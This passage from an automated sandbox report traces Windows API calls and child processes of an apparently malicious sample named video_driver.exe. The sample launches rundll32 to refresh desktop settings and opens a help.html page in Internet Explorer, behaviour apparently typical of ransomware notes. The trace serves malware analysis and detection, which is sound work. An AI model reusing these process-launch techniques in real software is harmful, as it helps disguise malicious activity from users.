[0042.759] _wcsicmp (_String1="RUNDLL32", _String2="CLS") returned 15 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="CALL") returned 15 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="VERIFY") returned -4 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="VER") returned -4 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="VOL") returned -4 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="EXIT") returned 13 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="SETLOCAL") returned -1 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="ENDLOCAL") returned 13 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="TITLE") returned -2 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="START") returned -1 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="DPATH") returned 14 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="KEYS") returned 7 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="MOVE") returned 5 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="PUSHD") returned 2 [0042.759] _wcsicmp (_String1="RUNDLL32", _String2="POPD") returned 2 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="ASSOC") returned 17 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="FTYPE") returned 12 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="BREAK") returned 16 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="COLOR") returned 15 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="MKLINK") returned 5 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="DIR") returned 14 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="ERASE") returned 13 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="DEL") returned 14 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="TYPE") returned -2 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="COPY") returned 15 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="CD") returned 15 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="CHDIR") returned 15 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="RENAME") returned 16 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="REN") returned 16 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="ECHO") returned 13 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="SET") returned -1 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="PAUSE") returned 2 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="DATE") returned 14 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="TIME") returned -2 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="PROMPT") returned 2 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="MD") returned 5 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="MKDIR") returned 5 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="RD") returned 17 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="RMDIR") returned 8 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="PATH") returned 2 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="GOTO") returned 11 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="SHIFT") returned -1 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="CLS") returned 15 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="CALL") returned 15 [0042.760] _wcsicmp (_String1="RUNDLL32", _String2="VERIFY") returned -4 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="VER") returned -4 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="VOL") returned -4 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="EXIT") returned 13 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="SETLOCAL") returned -1 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="ENDLOCAL") returned 13 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="TITLE") returned -2 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="START") returned -1 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="DPATH") returned 14 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="KEYS") returned 7 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="MOVE") returned 5 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="PUSHD") returned 2 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="POPD") returned 2 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="ASSOC") returned 17 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="FTYPE") returned 12 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="BREAK") returned 16 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="COLOR") returned 15 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="MKLINK") returned 5 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="FOR") returned 12 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="IF") returned 9 [0042.761] _wcsicmp (_String1="RUNDLL32", _String2="REM") returned 16 [0042.762] GetProcessHeap () returned 0x3d0000 [0042.762] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x210) returned 0x3e31a8 [0042.762] GetProcessHeap () returned 0x3d0000 [0042.762] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x86) returned 0x3e33c0 [0042.762] _wcsnicmp (_String1="RUND", _String2="cmd ", _MaxCount=0x4) returned 15 [0042.762] GetProcessHeap () returned 0x3d0000 [0042.762] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x418) returned 0x3d07f0 [0042.762] SetErrorMode (uMode=0x0) returned 0x0 [0042.762] SetErrorMode (uMode=0x1) returned 0x0 [0042.762] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3d07f8, lpFilePart=0x39ee50 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39ee50*="Desktop") returned 0x25 [0042.763] SetErrorMode (uMode=0x0) returned 0x1 [0042.763] GetProcessHeap () returned 0x3d0000 [0042.763] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3d07f0, Size=0x6e) returned 0x3d07f0 [0042.763] GetProcessHeap () returned 0x3d0000 [0042.763] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3d07f0) returned 0x6e [0042.763] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0042.763] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0042.763] GetProcessHeap () returned 0x3d0000 [0042.763] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x120) returned 0x3e3450 [0042.763] GetProcessHeap () returned 0x3d0000 [0042.763] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x238) returned 0x3d0868 [0042.770] GetProcessHeap () returned 0x3d0000 [0042.770] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3d0868, Size=0x122) returned 0x3d0868 [0042.770] GetProcessHeap () returned 0x3d0000 [0042.770] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3d0868) returned 0x122 [0042.770] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.770] GetProcessHeap () returned 0x3d0000 [0042.770] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xe0) returned 0x3e3578 [0042.770] GetProcessHeap () returned 0x3d0000 [0042.770] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e3578, Size=0x76) returned 0x3e3578 [0042.770] GetProcessHeap () returned 0x3d0000 [0042.770] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3e3578) returned 0x76 [0042.771] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.771] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x39ebec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39ebec) returned 0xffffffff [0042.771] GetLastError () returned 0x2 [0042.771] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE.*", fInfoLevelId=0x1, lpFindFileData=0x39ebcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39ebcc) returned 0xffffffff [0042.771] GetLastError () returned 0x2 [0042.771] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x39ebcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39ebcc) returned 0xffffffff [0042.771] GetLastError () returned 0x2 [0042.771] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.772] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x39ebec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39ebec) returned 0x3e35f8 [0042.772] GetProcessHeap () returned 0x3d0000 [0042.772] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x14) returned 0x3e3638 [0042.772] FindClose (in: hFindFile=0x3e35f8 | out: hFindFile=0x3e35f8) returned 1 [0042.772] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0042.772] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0042.772] GetConsoleTitleW (in: lpConsoleTitle=0x39f0c4, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0042.772] InitializeProcThreadAttributeList (in: lpAttributeList=0x39ef4c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x39f014 | out: lpAttributeList=0x39ef4c, lpSize=0x39f014) returned 1 [0042.772] UpdateProcThreadAttribute (in: lpAttributeList=0x39ef4c, dwFlags=0x0, Attribute=0x60001, lpValue=0x39f00c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x39ef4c, lpPreviousValue=0x0) returned 1 [0042.772] GetStartupInfoW (in: lpStartupInfo=0x39ef08 | out: lpStartupInfo=0x39ef08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x13, lpReserved2=0x3d1a0c, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0042.772] GetProcessHeap () returned 0x3d0000 [0042.772] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x18) returned 0x3e3658 [0042.772] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0042.772] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0042.772] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0042.772] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0042.772] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0042.772] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0042.772] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0042.772] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0042.772] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0042.773] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0042.773] GetProcessHeap () returned 0x3d0000 [0042.773] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e3658 | out: hHeap=0x3d0000) returned 1 [0042.773] GetProcessHeap () returned 0x3d0000 [0042.773] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xa) returned 0x3dff98 [0042.774] lstrcmpW (lpString1="\\rundll32.exe", lpString2="\\XCOPY.EXE") returned -1 [0042.775] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\rundll32.exe", lpCommandLine="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x39efa8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x39eff4 | out: lpCommandLine="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", lpProcessInformation=0x39eff4*(hProcess=0x78, hThread=0x74, dwProcessId=0x7e0, dwThreadId=0x54c)) returned 1 [0042.780] CloseHandle (hObject=0x74) returned 1 [0042.780] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0042.780] GetProcessHeap () returned 0x3d0000 [0042.780] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e5f78 | out: hHeap=0x3d0000) returned 1 [0042.780] GetEnvironmentStringsW () returned 0x3e5f78* [0042.780] GetProcessHeap () returned 0x3d0000 [0042.780] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb36) returned 0x3e4158 [0042.780] FreeEnvironmentStringsW (penv=0x3e5f78) returned 1 [0042.780] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0043.206] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x39eee8 | out: lpExitCode=0x39eee8*=0x0) returned 1 [0043.206] CloseHandle (hObject=0x78) returned 1 [0043.206] _vsnwprintf (in: _Buffer=0x39f030, _BufferCount=0x13, _Format="%08X", _ArgList=0x39eef4 | out: _Buffer="00000000") returned 8 [0043.206] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0043.206] GetProcessHeap () returned 0x3d0000 [0043.206] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e4158 | out: hHeap=0x3d0000) returned 1 [0043.206] GetEnvironmentStringsW () returned 0x3e4158* [0043.206] GetProcessHeap () returned 0x3d0000 [0043.206] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb5c) returned 0x3e9620 [0043.206] FreeEnvironmentStringsW (penv=0x3e4158) returned 1 [0043.206] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0043.206] GetProcessHeap () returned 0x3d0000 [0043.206] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e9620 | out: hHeap=0x3d0000) returned 1 [0043.206] GetEnvironmentStringsW () returned 0x3e4158* [0043.206] GetProcessHeap () returned 0x3d0000 [0043.206] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb5c) returned 0x3e9620 [0043.207] FreeEnvironmentStringsW (penv=0x3e4158) returned 1 [0043.207] GetProcessHeap () returned 0x3d0000 [0043.207] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3dff98 | out: hHeap=0x3d0000) returned 1 [0043.207] DeleteProcThreadAttributeList (in: lpAttributeList=0x39ef4c | out: lpAttributeList=0x39ef4c) [0043.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0043.207] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0043.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0043.207] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8b41ac | out: lpMode=0x4a8b41ac) returned 1 [0043.207] _get_osfhandle (_FileHandle=0) returned 0x3 [0043.207] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8b41b0 | out: lpMode=0x4a8b41b0) returned 1 [0043.207] SetConsoleInputExeNameW () returned 0x1 [0043.207] GetConsoleOutputCP () returned 0x1b5 [0043.208] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8b4260 | out: lpCPInfo=0x4a8b4260) returned 1 [0043.208] SetThreadUILanguage (LangId=0x0) returned 0x409 [0043.208] exit (_Code=0) Process: id = "16" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x45aed000" os_pid = "0x7e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x754" cmd_line = "RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 16 os_tid = 0x54c Process: id = "17" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x464b7000" os_pid = "0x7dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c start iexplore.exe %userprofile%/help.html" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 17 os_tid = 0x31c [0043.303] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fb84 | out: lpSystemTimeAsFileTime=0x20fb84*(dwLowDateTime=0x1ed1a0, dwHighDateTime=0x1d62400)) [0043.303] GetCurrentProcessId () returned 0x7dc [0043.303] GetCurrentThreadId () returned 0x31c [0043.303] GetTickCount () returned 0x1145df9 [0043.303] QueryPerformanceCounter (in: lpPerformanceCount=0x20fb7c | out: lpPerformanceCount=0x20fb7c*=16343620916) returned 1 [0043.305] GetModuleHandleA (lpModuleName=0x0) returned 0x4a270000 [0043.305] __set_app_type (_Type=0x1) [0043.305] __p__fmode () returned 0x770331f4 [0043.305] __p__commode () returned 0x770331fc [0043.305] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a2921a6) returned 0x0 [0043.305] __getmainargs (in: _Argc=0x4a294238, _Argv=0x4a294240, _Env=0x4a29423c, _DoWildCard=0, _StartInfo=0x4a294140 | out: _Argc=0x4a294238, _Argv=0x4a294240, _Env=0x4a29423c) returned 0 [0043.305] GetCurrentThreadId () returned 0x31c [0043.306] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x31c) returned 0x60 [0043.306] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0043.306] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0043.306] SetThreadUILanguage (LangId=0x0) returned 0x409 [0043.306] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0043.306] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fb14 | out: phkResult=0x20fb14*=0x0) returned 0x2 [0043.307] VirtualQuery (in: lpAddress=0x20fb4b, lpBuffer=0x20fae4, dwLength=0x1c | out: lpBuffer=0x20fae4*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.307] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fae4, dwLength=0x1c | out: lpBuffer=0x20fae4*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0043.307] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fae4, dwLength=0x1c | out: lpBuffer=0x20fae4*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0043.307] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fae4, dwLength=0x1c | out: lpBuffer=0x20fae4*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.307] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fae4, dwLength=0x1c | out: lpBuffer=0x20fae4*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0043.307] GetConsoleOutputCP () returned 0x1b5 [0043.307] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a294260 | out: lpCPInfo=0x4a294260) returned 1 [0043.307] SetConsoleCtrlHandler (HandlerRoutine=0x4a28e72a, Add=1) returned 1 [0043.307] _get_osfhandle (_FileHandle=1) returned 0x7 [0043.307] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0043.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0043.308] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2941ac | out: lpMode=0x4a2941ac) returned 1 [0043.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0043.308] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0043.308] _get_osfhandle (_FileHandle=0) returned 0x3 [0043.308] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2941b0 | out: lpMode=0x4a2941b0) returned 1 [0043.308] GetEnvironmentStringsW () returned 0x3c2088* [0043.308] GetProcessHeap () returned 0x3b0000 [0043.309] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xaca) returned 0x3c2b60 [0043.309] FreeEnvironmentStringsW (penv=0x3c2088) returned 1 [0043.309] GetProcessHeap () returned 0x3b0000 [0043.309] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4) returned 0x3c0cc0 [0043.309] GetEnvironmentStringsW () returned 0x3c2088* [0043.309] GetProcessHeap () returned 0x3b0000 [0043.309] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xaca) returned 0x3c3638 [0043.309] FreeEnvironmentStringsW (penv=0x3c2088) returned 1 [0043.309] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea84 | out: phkResult=0x20ea84*=0x68) returned 0x0 [0043.309] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x0, lpData=0x20ea90*=0x0, lpcbData=0x20ea88*=0x1000) returned 0x2 [0043.309] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x4, lpData=0x20ea90*=0x1, lpcbData=0x20ea88*=0x4) returned 0x0 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x0, lpData=0x20ea90*=0x1, lpcbData=0x20ea88*=0x1000) returned 0x2 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x4, lpData=0x20ea90*=0x0, lpcbData=0x20ea88*=0x4) returned 0x0 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x4, lpData=0x20ea90*=0x40, lpcbData=0x20ea88*=0x4) returned 0x0 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea8c, lpData=0x20ea90, lpcbData=0x20ea88*=0x1000 | out: lpType=0x20ea8c*=0x4, lpData=0x20ea90*=0x40, lpcbData=0x20ea88*=0x4) returned 0x0 [0043.310] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, 